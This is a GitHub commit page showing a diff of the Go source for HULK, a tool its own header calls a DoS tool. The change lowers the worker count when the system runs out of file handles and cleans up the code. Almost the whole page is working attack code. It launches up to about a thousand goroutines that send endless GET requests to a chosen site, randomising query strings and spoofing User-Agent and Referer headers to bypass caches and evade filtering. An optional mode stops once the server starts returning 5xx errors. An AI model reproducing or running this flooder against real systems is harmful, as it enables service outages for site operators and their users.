forked from grafov/hulk
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Lower number of workers if too many open files
Also code cleaned up a bit.
- Loading branch information
Alexander I.Grafov
committed
Jul 11, 2016
1 parent
a9b9ad4
commit 8daa478
Showing
1 changed file
with
93 additions
and
84 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1,62 +1,64 @@ | ||
| package main | ||
|
|
||
| /* | ||
| HULK DoS tool on Goroutines. Ported from Python. | ||
| HULK DoS tool on <strike>steroids</strike> goroutines. Just ported from Python with some improvements. | ||
| Original Python utility by Barry Shteiman http://www.sectorix.com/2012/05/17/hulk-web-server-dos-tool/ | ||
| This go program licensed under GPLv3. | ||
| Copyright Alexander I.Grafov <[email protected]> | ||
| */ | ||
|
|
||
| import ( | ||
| "os" | ||
| "flag" | ||
| "fmt" | ||
| "math/rand" | ||
| "net/http" | ||
| "net/url" | ||
| "math/rand" | ||
| "os" | ||
| "os/signal" | ||
| "syscall" | ||
| "strings" | ||
| "strconv" | ||
| "runtime" | ||
| "strings" | ||
| "sync/atomic" | ||
| "syscall" | ||
| ) | ||
|
|
||
| // const ACCEPT_CHARSET = "windows-1251,utf-8;q=0.7,*;q=0.7" // use it for runet | ||
| const ACCEPT_CHARSET = "ISO-8859-1,utf-8;q=0.7,*;q=0.7" | ||
| // const acceptCharset = "windows-1251,utf-8;q=0.7,*;q=0.7" // use it for runet | ||
| const acceptCharset = "ISO-8859-1,utf-8;q=0.7,*;q=0.7" | ||
|
|
||
| const ( | ||
| STARTED = iota | ||
| GOT_OK | ||
| EXIT_ERR | ||
| TARGET_OK | ||
| callGotOk uint8 = iota | ||
| callExitOnErr | ||
| callExitOnTooManyFiles | ||
| targetComplete | ||
| ) | ||
|
|
||
| // global params | ||
| var request_counter int = 0 | ||
| var safe bool = false | ||
| var headers_referers []string = []string{ | ||
| "http://www.google.com/?q=", | ||
| "http://www.usatoday.com/search/results?q=", | ||
| "http://engadget.search.aol.com/search?q=", | ||
| //"http://www.google.ru/?hl=ru&q=", | ||
| //"http://yandex.ru/yandsearch?text=", | ||
| } | ||
| var headers_useragents []string = []string{ | ||
| "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3", | ||
| "Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)", | ||
| "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)", | ||
| "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1", | ||
| "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1", | ||
| "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)", | ||
| "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)", | ||
| "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)", | ||
| "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)", | ||
| "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)", | ||
| "Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)", | ||
| "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51", | ||
| } | ||
|
|
||
| var ( | ||
| request_counter int = 0 | ||
| safe bool = false | ||
| headers_referers []string = []string{ | ||
| "http://www.google.com/?q=", | ||
| "http://www.usatoday.com/search/results?q=", | ||
| "http://engadget.search.aol.com/search?q=", | ||
| //"http://www.google.ru/?hl=ru&q=", | ||
| //"http://yandex.ru/yandsearch?text=", | ||
| } | ||
| headers_useragents []string = []string{ | ||
| "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3", | ||
| "Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)", | ||
| "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)", | ||
| "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1", | ||
| "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1", | ||
| "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)", | ||
| "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)", | ||
| "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)", | ||
| "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)", | ||
| "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)", | ||
| "Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)", | ||
| "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51", | ||
| } | ||
| cur int32 | ||
| ) | ||
|
|
||
| func main() { | ||
| var safe bool | ||
|
|
@@ -65,11 +67,11 @@ func main() { | |
| flag.BoolVar(&safe, "safe", false, "Autoshut after dos.") | ||
| flag.StringVar(&site, "site", "http://localhost", "Destination site.") | ||
| flag.Parse() | ||
|
|
||
| t := os.Getenv("HULKMAXPROCS") | ||
| maxproc, e := strconv.Atoi(t) | ||
| if e != nil { | ||
| maxproc = 1024 | ||
| maxproc = 1023 | ||
| } | ||
|
|
||
| u, e := url.Parse(site) | ||
|
|
@@ -80,28 +82,31 @@ func main() { | |
|
|
||
| go func() { | ||
| fmt.Println("-- HULK Attack Started --\n Go!\n\n") | ||
| ss := make(chan int, 64) // start/stop flag | ||
| cur, err, sent := 0, 0, 0 | ||
| fmt.Println("In use |\tResp OK |\tGot err") | ||
| ss := make(chan uint8, 8) | ||
| var ( | ||
| err, sent int32 | ||
| ) | ||
| fmt.Println("In use |\tResp OK |\tGot err") | ||
| for { | ||
| if cur < maxproc { | ||
| if atomic.LoadInt32(&cur) < int32(maxproc-1) { | ||
| go httpcall(site, u.Host, ss) | ||
| } | ||
| if sent % 10 == 0 { | ||
| fmt.Printf("\r%6d |\t%7d |\t%6d", cur, sent, err) | ||
| if sent%10 == 0 { | ||
| fmt.Printf("\r%6d of max %-6d |\t%7d |\t%6d", cur, maxproc, sent, err) | ||
| } | ||
| switch <-ss { | ||
| case STARTED: | ||
| cur++ | ||
| case EXIT_ERR: | ||
| case callExitOnErr: | ||
| atomic.AddInt32(&cur, -1) | ||
| err++ | ||
| case callExitOnTooManyFiles: | ||
| atomic.AddInt32(&cur, -1) | ||
| err++ | ||
| cur-- | ||
| if err % 10 == 0 { | ||
| runtime.GC() | ||
| } | ||
| case GOT_OK: | ||
| maxproc-- | ||
| case callGotOk: | ||
| sent++ | ||
| case TARGET_OK: | ||
| case targetComplete: | ||
| sent++ | ||
| fmt.Printf("\r%-6d of max %-6d |\t%7d |\t%6d", cur, maxproc, sent, err) | ||
| fmt.Println("\r-- HULK Attack Finished -- \n\n\r") | ||
| os.Exit(0) | ||
| } | ||
|
|
@@ -114,51 +119,55 @@ func main() { | |
| fmt.Println("\r\n-- Interrupted by user -- \n") | ||
| } | ||
|
|
||
| func httpcall(url string, host string, s chan int) { | ||
| func httpcall(url string, host string, s chan uint8) { | ||
| atomic.AddInt32(&cur, 1) | ||
|
|
||
| var param_joiner string | ||
| var client = new(http.Client) | ||
|
|
||
| s<-STARTED | ||
| if strings.ContainsRune(url, '?') { | ||
| param_joiner = "&" | ||
| } else { | ||
| param_joiner = "?" | ||
| } | ||
|
|
||
| Reuse: | ||
| q, e := http.NewRequest("GET", url + param_joiner + buildblock(rand.Intn(7) + 3) + "=" + buildblock(rand.Intn(7) + 3), nil) | ||
| if e != nil { | ||
| s<-EXIT_ERR | ||
| return | ||
| } | ||
| q.Header.Set("User-Agent", headers_useragents[rand.Intn(len(headers_useragents))]) | ||
| q.Header.Set("Cache-Control", "no-cache") | ||
| q.Header.Set("Accept-Charset", ACCEPT_CHARSET) | ||
| q.Header.Set("Referer", headers_referers[rand.Intn(len(headers_referers))] + buildblock(rand.Intn(5) + 5)) | ||
| q.Header.Set("Keep-Alive", strconv.Itoa(rand.Intn(10)+100)) | ||
| q.Header.Set("Connection", "keep-alive") | ||
| q.Header.Set("Host", host) | ||
| r, e := client.Do(q) | ||
| if e != nil { | ||
| fmt.Fprintln(os.Stderr, e.Error()) | ||
| s<-EXIT_ERR | ||
| return | ||
| } | ||
| r.Body.Close() | ||
| s<-GOT_OK | ||
| if safe { | ||
| switch r.StatusCode { | ||
| case 500, 501, 502, 503, 504: | ||
| s<-TARGET_OK | ||
| for { | ||
| q, e := http.NewRequest("GET", url+param_joiner+buildblock(rand.Intn(7)+3)+"="+buildblock(rand.Intn(7)+3), nil) | ||
| if e != nil { | ||
| s <- callExitOnErr | ||
| return | ||
| } | ||
| q.Header.Set("User-Agent", headers_useragents[rand.Intn(len(headers_useragents))]) | ||
| q.Header.Set("Cache-Control", "no-cache") | ||
| q.Header.Set("Accept-Charset", acceptCharset) | ||
| q.Header.Set("Referer", headers_referers[rand.Intn(len(headers_referers))]+buildblock(rand.Intn(5)+5)) | ||
| q.Header.Set("Keep-Alive", strconv.Itoa(rand.Intn(10)+100)) | ||
| q.Header.Set("Connection", "keep-alive") | ||
| q.Header.Set("Host", host) | ||
| r, e := client.Do(q) | ||
| if e != nil { | ||
| fmt.Fprintln(os.Stderr, e.Error()) | ||
| if strings.Contains(e.Error(), "socket: too many open files") { | ||
| s <- callExitOnTooManyFiles | ||
| return | ||
| } | ||
| s <- callExitOnErr | ||
| return | ||
| } | ||
| r.Body.Close() | ||
| s <- callGotOk | ||
| if safe { | ||
| if r.StatusCode >= 500 { | ||
| s <- targetComplete | ||
| } | ||
| } | ||
| } | ||
| goto Reuse | ||
| } | ||
|
|
||
| func buildblock(size int)(s string) { | ||
| func buildblock(size int) (s string) { | ||
| var a []rune | ||
| for i := 0; i < size; i++ { | ||
| a = append(a, rune(rand.Intn(25) + 65)) | ||
| a = append(a, rune(rand.Intn(25)+65)) | ||
| } | ||
| return string(a) | ||
| } | ||
| } | ||